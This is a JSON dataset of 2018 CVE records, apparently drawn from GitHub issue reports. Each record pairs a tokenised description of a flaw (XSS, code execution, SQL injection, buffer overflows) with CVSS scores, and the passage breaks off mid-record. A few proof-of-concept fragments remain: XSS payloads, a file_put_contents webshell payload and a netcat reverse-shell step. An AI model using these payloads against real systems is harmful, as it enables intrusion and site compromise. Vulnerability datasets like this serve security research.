    {
        "CVE_ID": "CVE-2018-17130",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/3",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/3",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T08:02:20Z",
        "description": "phpmywind NUMBERTAG Persistent(stored) XSS. Attackers can get admin's Cookie and do otherthing APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG register an ordinary user and find an article to comment FILETAG NUMBERTAG find an article to comment such as URLTAG FILETAG NUMBERTAG use burpsuite and modify Referer,such as APITAG javascript:alert(/panghu from APITAG FILETAG APITAG as Admin and request FILETAG to review user's comments and click the comment that include xss payload",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17131",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/5",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/5",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T09:32:16Z",
        "description": "phpmywind NUMBERTAG Code Execution2. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG FILETAG (select number!!!!!) payload NUMBERTAG file_put_contents(\"../ FILETAG \",\"just a test\"); FILETAG NUMBERTAG then the payload is written in the FILETAG FILETAG then in root directory panghusec.txt will be created: ) In summary: from FILETAG Insert data into database and in lines NUMBERTAG enter APITAG function and code execution :)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-17132",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/4",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/4",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T08:52:24Z",
        "description": "phpmywind NUMBERTAG Code Execution1. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-17133",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/6",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/6",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T10:06:27Z",
        "description": "phpmywind NUMBERTAG Code Execution3. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code APITAG FILETAG NUMBERTAG then request URLTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-17134",
        "Issue_Url_old": "https://github.com/panghusec/exploit/issues/7",
        "Issue_Url_new": "https://github.com/panghusec/exploit/issues/7",
        "Repo_new": "panghusec/exploit",
        "Issue_Created_At": "2018-08-15T10:25:39Z",
        "description": "phpmywind NUMBERTAG Code Execution4. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code FILETAG FILETAG FILETAG $cfg_webpath fill in NUMBERTAG cfg_author fill in APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-17142",
        "Issue_Url_old": "https://github.com/golang/go/issues/27702",
        "Issue_Url_new": "https://github.com/golang/go/issues/27702",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-09-17T01:46:37Z",
        "description": "PATHTAG APITAG panic caused by malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17143",
        "Issue_Url_old": "https://github.com/golang/go/issues/27704",
        "Issue_Url_new": "https://github.com/golang/go/issues/27704",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-09-17T02:05:34Z",
        "description": "PATHTAG panic: runtime error: invalid memory address or nil pointer dereference. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit. What did you see instead? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17175",
        "Issue_Url_old": "https://github.com/marshmallow-code/marshmallow/issues/772",
        "Issue_Url_new": "https://github.com/marshmallow-code/marshmallow/issues/772",
        "Repo_new": "marshmallow-code/marshmallow",
        "Issue_Created_At": "2018-04-12T23:11:28Z",
        "description": "Empty Only Treated as None. When the only parameter is an empty list/set, it causes all the fields to be de/serialized like None . The implementation of NUMBERTAG and NUMBERTAG are not in compliance with their respective docs. > only (_tuple_) \u2013 A list or tuple of fields to serialize. If None , all fields will be serialized. CODETAG This could create a security vulnerability if an application was dynamically generating the field set based on security role. A filter that was meant to hide everything would inadvertently show everything.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17229",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/453",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/453",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-17T14:18:53Z",
        "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17230",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/455",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/455",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-17T14:18:56Z",
        "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17232",
        "Issue_Url_old": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
        "Issue_Url_new": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
        "Repo_new": "docmarionum1/slack-archive-bot",
        "Issue_Created_At": "2018-09-19T19:37:02Z",
        "description": "Fix security vulnerabilities NUMBERTAG SQL injection. When searching the archive user input is used directly to create an SQL query. This can be exploited to view all messages, including messages from private channels the user is not a member of. Potentially exploitable to gain Remote Code Execution (RCE) depending on the configuration of the server NUMBERTAG Information disclosure. If a user searches for a phrase that has been posted in a private channel the user is not a member of, the bot returns nothing rather than \"No results found\". This leaks to the user that the phrase has been said.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17282",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/457",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/457",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-20T14:54:34Z",
        "description": "SEGV in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master NUMBERTAG b NUMBERTAG APITAG URLTAG gdb info: ERRORTAG Asan info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17283",
        "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/4",
        "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/4",
        "Repo_new": "x-f1v3/forcve",
        "Issue_Created_At": "2018-09-20T11:15:20Z",
        "description": "Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection. Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn Firewall Analyzer NUMBERTAG Build NUMBERTAG has permission bypass Vulnerability which can lead to information disclosure and SQL injection Proof of Concept: Getting the apikey unauthorizedly: CODETAG Local site test: FILETAG Add the admin user by only using the apikey poc: ERRORTAG Local site test: FILETAG FILETAG Sql injection by only using the apikey poc: CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17292",
        "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/109",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/109",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-09-16T09:05:30Z",
        "description": "Mishandling input files with file length less than NUMBERTAG bytes (crash). During loading module ( URLTAG there is a missing check for cases where file bytes are less than NUMBERTAG bytes. This may crash wavm. For example, when the input only contains APITAG , APITAG reports ERRORTAG In another extreme case, when the input is empty string, it raises SIGSEGV .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17293",
        "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/110",
        "Issue_Url_new": "https://github.com/wavm/wavm/issues/110",
        "Repo_new": "wavm/wavm",
        "Issue_Created_At": "2018-09-16T11:40:56Z",
        "description": "Unhandled runtime exception: APITAG (sigabrt). When executing APITAG , the vm may trigger a ERRORTAG as of NUMBERTAG e8b9. POCs: FILETAG FILETAG gdb output is like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17294",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/635",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/635",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-09-01T02:43:25Z",
        "description": "APITAG stack buffer overflow at APITAG APITAG may suffer from a stack buffer overflow on a stack variable inbuf defined in APITAG . Relevant files are available here URLTAG . Command lines to trigger the crashes: CODETAG A sample ASAN output is like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17297",
        "Issue_Url_old": "https://github.com/looly/hutool/issues/162",
        "Issue_Url_new": "https://github.com/dromara/hutool/issues/162",
        "Repo_new": "dromara/hutool",
        "Issue_Created_At": "2018-09-13T02:51:52Z",
        "description": "zip_slip\u6f0f\u6d1e. \u5927\u5bb6\u597d, APITAG . \u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG FILETAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17300",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/4",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/4",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2018-08-16T12:46:28Z",
        "description": "XSS APITAG in APITAG Affected software: APITAG Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the section menus and click on add item, and name them with malicious javascript. FILETAG Step3: Here the xss got executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17301",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1038",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1038",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2018-09-13T07:43:03Z",
        "description": "Non Persistent or Type II XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Non Persistent or Type II XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable website, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. Proof of concept: Step1: Login to the CRM. Step2: In the search panel, use the malicious javascript and hit enter the code will get executed successfully. FILETAG FILETAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17302",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1039",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1039",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2018-09-13T07:47:55Z",
        "description": "Stored XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Stored XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the CRM and in the mailbox use the link for entering the malicious javascript into it and save it as a draft message and whenever you open the draft msg the malicious javascript will get executed. FILETAG FILETAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17317",
        "Issue_Url_old": "https://github.com/PatatasFritas/PatataWifi/issues/1",
        "Issue_Url_new": "https://github.com/patatasfritas/patatawifi/issues/1",
        "Repo_new": "PatatasFritas/PatataWifi",
        "Issue_Created_At": "2018-09-16T04:36:17Z",
        "description": "Command to execute security issues. File FILETAG : APITAG NUMBERTAG output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio) //LOG $rs = APITAG 'a'); fwrite($rs, date(\"Y m d H:i:s\").\" \".\"$bin_exec sh c $exec \"); if(is_array($output) and array_key_exists NUMBERTAG output)) { fwrite($rs, APITAG \"); } elseif (is_string($output)) { fwrite($rs, APITAG \"); } fclose($rs); return $output; } Command execution was formed. POC: POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG logged_in=yes; dotcom_user=ly NUMBERTAG has_recent_activity NUMBERTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17317",
        "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/276",
        "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/276",
        "Repo_new": "xtr4nge/fruitywifi",
        "Issue_Created_At": "2020-10-02T17:59:08Z",
        "description": "Remote Command Execution in APITAG NUMBERTAG Issue Description: During the analysis of the software it was observed that the fruitywifi APITAG io_mode= PATHTAG NUMBERTAG Start a NC Listener on port NUMBERTAG Note : In order to bypass, we need to satisfy the qoutes then insert our payload and upon processing the request, you will be able to get the shell.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17320",
        "Issue_Url_old": "https://github.com/ucms/ucms/issues/1",
        "Issue_Url_new": "https://github.com/ucms/ucms/issues/1",
        "Repo_new": "ucms/ucms",
        "Issue_Created_At": "2018-09-19T05:49:25Z",
        "description": "ucms NUMBERTAG Storage XSS. Storage XSS in PATHTAG via minfo parameter FILETAG column name=>mname FILETAG skipping to FILETAG \uff0ctracking the four parameter. As the $_POST FILETAG as check for mname,the program checked it's length which should be larger than one and smaller than twenty.it is also should fit its APITAG shouldn't use the column which has been reserved by cms. FILETAG following the function of dbstr,it check the two punctuation FILETAG then join those parameter to the sql statement and put it into database for execution FILETAG FILETAG finally\uff0cprogram skip to FILETAG at line NUMBERTAG a query via ucms_moudle\uff0cat line NUMBERTAG print the payload we have already insert into table FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17332",
        "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/2",
        "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/2",
        "Repo_new": "agambier/libsvg2",
        "Issue_Created_At": "2018-09-12T00:46:15Z",
        "description": "bug1: a DOS Dead Block BUG. POC: URLTAG descrtiption: Dead Block DOS,a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system. APITAG APITAG is always set to NUMBERTAG CODETAG If None of the branches which can affect the value of APITAG APITAG will return the same value which is delivered as a parameter. Unfortunately, a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17333",
        "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/4",
        "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/4",
        "Repo_new": "agambier/libsvg2",
        "Issue_Created_At": "2018-09-12T00:59:36Z",
        "description": "bug NUMBERTAG another stack buffer overflow bug which may lead to RCE. ASAN: URLTAG POC: URLTAG EXP: URLTAG password:i5n2 Description: A sscanf operation without the check of string length, which may lead to stack over flow. When this lib is used to parse svg by a browser, RCE is possible. CODETAG APITAG This call of function doesn't check the string in APITAG which can lead to stack overflow! debug image: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17334",
        "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/3",
        "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/3",
        "Repo_new": "agambier/libsvg2",
        "Issue_Created_At": "2018-09-12T00:54:32Z",
        "description": "bug2: a stack buffer overflow bug of parse WHICH may lead to RCE. POC: URLTAG ASAN: URLTAG Description: If APITAG can't hit the judge follow in a right range, the coptsize of strncpy may be too large, which will directly cause stack overflow. If the lib is used by a browser, RCE is possible! CODETAG APITAG APITAG pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d NUMBERTAG saved $rbp and ret addr has been overwriteed, when bypassing the poc crash erro, $ip will be controlled. debug pic: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17336",
        "Issue_Url_old": "https://github.com/storaged-project/udisks/issues/578",
        "Issue_Url_new": "https://github.com/storaged-project/udisks/issues/578",
        "Repo_new": "storaged-project/udisks",
        "Issue_Created_At": "2018-09-16T04:52:50Z",
        "description": "Malformed filesystem labels allows for a string format vulnerability. A malformed file system label can trigger a string format vulnerability in udisks. For example: CODETAG Crashes udisks2, and since the %n modifier allows for arbitrary memory manipulation this could pose a security risk, as udisksd runs root. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17338",
        "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/29",
        "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/29",
        "Repo_new": "kermitt2/pdfalto",
        "Issue_Created_At": "2018-09-21T08:14:04Z",
        "description": "Heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build pdfalto URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17341",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/345",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/345",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-09-22T18:03:54Z",
        "description": "Arbitrary file read. when we use APITAG or APITAG Rewrite\" routing in FILETAG line NUMBERTAG ERRORTAG althouch APITAG has been baned,we can use APITAG bypass in windows and the we can control the path in PATHTAG line NUMBERTAG APITAG and we do not need Authenticated in FILETAG line NUMBERTAG APITAG if APITAG we can bypass Authenticated payload: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-17361",
        "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/7",
        "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/7",
        "Repo_new": "alterebro/weaselcms",
        "Issue_Created_At": "2018-08-17T14:51:16Z",
        "description": "I found a reflective XSS vulnerability. Mainly cause by using $_SERVER FILETAG FILETAG The payload here is: APITAG You should know that you have used this kind of method so many times. Actually, you can use APITAG to replace it. or use APITAG filter.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17369",
        "Issue_Url_old": "https://github.com/qzw1210/springboot_authority/issues/4",
        "Issue_Url_new": "https://github.com/qzw1210/springboot_authority/issues/4",
        "Repo_new": "qzw1210/springboot_authority",
        "Issue_Created_At": "2018-09-12T08:09:09Z",
        "description": "There are some stored xss via PATHTAG via PATHTAG APITAG name and description parameters has stored xss FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17420",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/37",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/37",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2018-09-18T15:43:11Z",
        "description": "There is a sql injection in the article search box. APITAG CODETAG TABLE_NAME Field not verified",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-17421",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/39",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/39",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2018-09-18T16:01:05Z",
        "description": "There is a stored XSS in the file upload area. After the file is uploaded correctly, \" APITAG \" will be displayed in the edit APITAG with the page display, the XSS purpose is achieved by modifying the display content. Poc click me aa\"onmouseover=\"alert NUMBERTAG s= \"click me\") The page is displayed as \" APITAG \"",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17422",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/15286",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/15286",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2018-09-14T07:04:46Z",
        "description": "APITAG NUMBERTAG open redirect. Current Behavior APITAG NUMBERTAG allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a malformed URL e.g. CODETAG FILETAG Possible Solution limit the redirect target",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17423",
        "Issue_Url_old": "https://github.com/e107inc/e107/issues/3414",
        "Issue_Url_new": "https://github.com/e107inc/e107/issues/3414",
        "Repo_new": "e107inc/e107",
        "Issue_Created_At": "2018-09-03T02:35:20Z",
